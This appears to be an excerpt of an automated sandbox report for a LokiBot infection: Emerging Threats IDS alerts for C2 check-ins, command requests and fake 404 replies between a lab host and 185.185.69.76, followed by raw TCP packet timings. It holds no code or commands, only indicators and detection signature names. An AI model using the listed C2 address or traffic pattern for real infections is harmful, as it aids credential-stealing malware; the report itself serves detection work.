                01/28/22-23:38:03.551551 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49802 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:06.424436 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49818 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:06.424436 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49818 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:06.424436 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49818 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:06.424436 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49818 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:07.849755 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49818 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:10.077239 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49830 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:10.077239 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49830 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:10.077239 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49830 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:10.077239 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49830 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:11.381909 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49830 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:12.712442 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49840 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:12.712442 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49840 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:12.712442 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49840 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:12.712442 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49840 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:14.111048 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49840 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:17.281043 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49841 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:17.281043 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49841 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:17.281043 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49841 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:17.281043 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49841 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:18.654023 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49841 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:20.171529 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49842 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:20.171529 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49842 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:20.171529 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49842 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:20.171529 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49842 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:21.628648 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49842 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:23.240806 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49845 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:23.240806 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49845 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:23.240806 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49845 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:23.240806 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49845 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:24.676434 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49845 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:27.482883 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49850 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:27.482883 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49850 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:27.482883 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49850 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:27.482883 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49850 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:28.925374 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49850 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:31.054520 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49851 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:31.054520 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49851 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:31.054520 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49851 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:31.054520 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49851 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:32.352724 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49851 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:33.510655 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49852 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:33.510655 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49852 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:33.510655 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49852 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:33.510655 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49852 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:35.007775 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49852 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:37.134931 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49854 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:37.134931 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49854 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:37.134931 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49854 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:37.134931 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49854 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:38.454947 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49854 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:40.133791 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49855 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:40.133791 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49855 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:40.133791 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49855 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:40.133791 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49855 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:41.392922 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49855 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:42.445022 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49862 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:42.445022 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49862 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:42.445022 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49862 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:42.445022 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49862 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:43.841937 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49862 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:46.720808 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49870 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:46.720808 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49870 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:46.720808 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49870 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:46.720808 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49870 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:48.177226 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49870 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:49.452650 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49881 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:49.452650 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49881 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:49.452650 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49881 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:49.452650 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49881 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:50.674109 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49881 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:52.315956 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49882 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:52.315956 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49882 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:52.315956 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49882 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:52.315956 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49882 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:53.689454 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49882 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:54.799526 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49883 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:54.799526 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49883 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:54.799526 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49883 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:54.799526 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49883 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:56.145381 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49883 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:57.255335 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49885 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:57.255335 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49885 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:57.255335 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49885 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:57.255335 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49885 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:58.636997 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49885 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:39:00.138023 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49886 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:39:00.138023 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49886 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:39:00.138023 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49886 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:39:00.138023 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49886 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:39:01.668779 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49886 | 185.185.69.76 | 192.168.2.6
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jan 28, 2022 23:37:29.329282999 CET8049779185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:29.329364061 CET4977980192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:29.395251036 CET8049779185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:30.738581896 CET8049779185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:30.738667965 CET4977980192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:30.738718033 CET4977980192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:30.804800987 CET8049779185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:33.891877890 CET4978080192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:33.958883047 CET8049780185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:33.959032059 CET4978080192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:33.962521076 CET4978080192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:34.028996944 CET8049780185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:34.029126883 CET4978080192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:34.095474958 CET8049780185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:35.373624086 CET8049780185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:35.373718977 CET4978080192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:35.373763084 CET4978080192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:35.440495968 CET8049780185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:36.518332958 CET4978280192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:36.586925983 CET8049782185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:36.587069988 CET4978280192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:36.594727993 CET4978280192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:36.662831068 CET8049782185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:36.663120031 CET4978280192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:36.732475996 CET8049782185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:37.913034916 CET8049782185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:37.913142920 CET4978280192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:37.913189888 CET4978280192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:37.980871916 CET8049782185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:39.345082998 CET4978380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:39.405669928 CET8049783185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:39.405893087 CET4978380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:39.408766985 CET4978380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:39.465625048 CET8049783185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:39.466222048 CET4978380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:39.522831917 CET8049783185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:40.689152956 CET8049783185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:40.689372063 CET4978380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:40.689424992 CET4978380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:40.746046066 CET8049783185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:41.903774023 CET4978480192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:41.970890999 CET8049784185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:41.971019983 CET4978480192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:41.973819971 CET4978480192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:42.040855885 CET8049784185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:42.042471886 CET4978480192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:42.109639883 CET8049784185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:43.403239012 CET8049784185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:43.403425932 CET4978480192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:43.403479099 CET4978480192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:43.471338987 CET8049784185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:44.713737965 CET4978780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:44.781965017 CET8049787185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:44.782114983 CET4978780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:44.786353111 CET4978780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:44.854301929 CET8049787185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:44.854403019 CET4978780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:44.922265053 CET8049787185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:46.235904932 CET8049787185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:46.236442089 CET4978780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:46.236538887 CET4978780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:46.304579020 CET8049787185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:50.396802902 CET4979380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:50.453237057 CET8049793185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:50.453423977 CET4979380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:51.111628056 CET4979380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:51.168287992 CET8049793185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:51.168366909 CET4979380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:51.224617958 CET8049793185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:52.495630026 CET8049793185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:52.500133038 CET4979380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:52.500188112 CET4979380192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:52.556773901 CET8049793185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:55.018079996 CET4979580192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:55.085529089 CET8049795185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:55.085894108 CET4979580192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:55.089534044 CET4979580192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:55.157022953 CET8049795185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:55.158164978 CET4979580192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:55.225581884 CET8049795185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:56.498845100 CET8049795185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:56.499047995 CET4979580192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:56.499113083 CET4979580192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:56.566693068 CET8049795185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:59.390140057 CET4979780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:59.457602978 CET8049797185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:59.457735062 CET4979780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:59.460407019 CET4979780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:59.527903080 CET8049797185.185.69.76192.168.2.6
                Jan 28, 2022 23:37:59.528026104 CET4979780192.168.2.6185.185.69.76
                Jan 28, 2022 23:37:59.595693111 CET8049797185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:00.863837957 CET8049797185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:00.863987923 CET4979780192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:00.864013910 CET4979780192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:00.931344986 CET8049797185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:02.099062920 CET4980280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:02.166270971 CET8049802185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:02.166413069 CET4980280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:02.169111967 CET4980280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:02.235783100 CET8049802185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:02.235896111 CET4980280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:02.302160025 CET8049802185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:03.551551104 CET8049802185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:03.551623106 CET4980280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:03.551714897 CET4980280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:03.618033886 CET8049802185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:06.334054947 CET4981880192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:06.391047001 CET8049818185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:06.391208887 CET4981880192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:06.424436092 CET4981880192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:06.481513023 CET8049818185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:06.481630087 CET4981880192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:06.537770987 CET8049818185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:07.849755049 CET8049818185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:07.851003885 CET4981880192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:07.851056099 CET4981880192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:07.907166958 CET8049818185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:09.981221914 CET4983080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:10.037396908 CET8049830185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:10.037559032 CET4983080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:10.077239037 CET4983080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:10.133704901 CET8049830185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:10.133827925 CET4983080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:10.190794945 CET8049830185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:11.381908894 CET8049830185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:11.382003069 CET4983080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:11.382023096 CET4983080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:11.479492903 CET8049830185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:12.641791105 CET4984080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:12.709249973 CET8049840185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:12.709609032 CET4984080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:12.712441921 CET4984080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:12.779907942 CET8049840185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:12.782733917 CET4984080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:12.850428104 CET8049840185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:14.111047983 CET8049840185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:14.111148119 CET4984080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:14.111197948 CET4984080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:14.178551912 CET8049840185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:17.210783958 CET4984180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:17.277822971 CET8049841185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:17.277930021 CET4984180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:17.281043053 CET4984180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:17.348476887 CET8049841185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:17.348575115 CET4984180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:17.415513039 CET8049841185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:18.654022932 CET8049841185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:18.654166937 CET4984180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:18.654253006 CET4984180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:18.721191883 CET8049841185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:20.100825071 CET4984280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:20.168157101 CET8049842185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:20.168375969 CET4984280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:20.171529055 CET4984280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:20.238864899 CET8049842185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:20.238980055 CET4984280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:20.306335926 CET8049842185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:21.628648043 CET8049842185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:21.628839970 CET4984280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:21.628868103 CET4984280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:21.696358919 CET8049842185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:23.171056032 CET4984580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:23.237695932 CET8049845185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:23.237809896 CET4984580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:23.240806103 CET4984580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:23.307440042 CET8049845185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:23.307615995 CET4984580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:23.374147892 CET8049845185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:24.676434040 CET8049845185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:24.676513910 CET4984580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:24.725253105 CET4984580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:24.791759968 CET8049845185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:27.412389040 CET4985080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:27.479950905 CET8049850185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:27.480096102 CET4985080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:27.482882977 CET4985080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:27.550331116 CET8049850185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:27.550404072 CET4985080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:27.617674112 CET8049850185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:28.925374031 CET8049850185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:28.928560019 CET4985080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:28.928602934 CET4985080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:28.996134996 CET8049850185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:30.994256020 CET4985180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:31.050622940 CET8049851185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:31.050769091 CET4985180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:31.054519892 CET4985180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:31.111917019 CET8049851185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:31.112103939 CET4985180192.168.2.6185.185.69.76
